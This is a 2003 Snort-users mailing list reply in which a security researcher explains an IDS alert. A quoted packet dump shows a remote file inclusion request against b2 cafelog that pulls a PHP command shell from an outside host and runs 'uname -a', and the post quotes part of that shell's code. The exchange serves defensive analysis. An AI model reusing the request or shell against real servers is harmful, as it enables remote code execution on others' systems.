[Snort-users] Is it an real attack ?

Nigel Houghton nigel at ...1935...
Mon Dec 29 10:11:04 EST 2003


Around 8:52am someone said:

s :   6. Is it an real attack ? (=?iso-8859-1?Q?Roberto_Samarone_Ara=FAjo_=28RSA=29?=)
s :
s :Message: 6
s :From: =?iso-8859-1?Q?Roberto_Samarone_Ara=FAjo_=28RSA=29?= <sama at ...10714...>
s :To: <snort-users at lists.sourceforge.net>
s :Date: Mon, 29 Dec 2003 04:07:57 -0800
s :Subject: [Snort-users] Is it an real attack ?
s :
s :Hi,
s :
s :     Verifying the snort logs, I found the following attack:
s :
s :[nessus] WEB-PHP b2 cafelog gm-2-b2.php remote command execution attempt
s :
s :000 : 47 45 54 20 2F 2F 62 32 2D 74 6F 6F 6C 73 2F 67   GET //b2-tools/g
s :010 : 6D 2D 32 2D 62 32 2E 70 68 70 3F 62 32 69 6E 63   m-2-b2.php?b2inc
s :020 : 3D 68 74 74 70 3A 2F 2F 77 77 77 2E 63 6F 72 6E   =http://www.corn
s :030 : 61 67 65 2E 68 70 67 2E 63 6F 6D 2E 62 72 2F 63   age.hpg.com.br/c
s :040 : 6D 64 2E 74 78 74 3F 3F 26 63 6D 64 3D 75 6E 61   md.txt??&cmd=una
s :050 : 6D 65 25 32 30 2D 61 3F 26 63 6D 64 3D 75 6E 61   me%20-a?&cmd=una
s :060 : 6D 65 25 32 30 2D 61 3B 65 63 68 6F 25 32 30 58   me%20-a;echo%20X
s :070 : 46 54 45 41 4D 20 48 54 54 50 2F 31 2E 30 0D 0A   FTEAM HTTP/1.0..
s :080 : 48 4F 53 74 3A 20 43 69 72 2E 69 65 73 71 6D 6A   HOST: mysite.com-
s :090 : 50 61 7E 65 64 75 2E 62 42 0D 0A 3D 9A            mysite.com ....
s :
s :I entered on the site: http://www.cornage.hpg.com.br/cmd.txt and I found the
s :following code:
s :
s :-cmd  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
s :  $output = ob_get_contents();
s :  ob_end_clean();
s :  $output = str_replace("\n","\n-cmd ",$output);
s :  if (!empty($output)) echo  str_replace(">", ">", str_replace("<", "<",
s :$output));
s :
s :?>
s :
s :What kind of attack is this ? Are there any place where can I find
s :informations about this attack ?

Always check the rule documentation first:

 http://www.snort.org/snort-db/sid.html?sid=2144

If you are running the cafelog application then yes, this was an attempted
intrusion/attack. The attacker tried to include some code to execute on
the webserver.

The attacker was also trying to execute some system commands like "uname
-a" to get system information as well as the command "echo".

s :Thanks,
s :
s :Robert

-----------------------------------------------------------------------
Nigel Houghton        Security Research Engineer        Sourcefire Inc.
                     Vulnerability Research Team

"In an emergency situation involving two or more officers of equal rank,
seniority will be granted to whichever officer can program a vcr."





More information about the Snort-users mailing list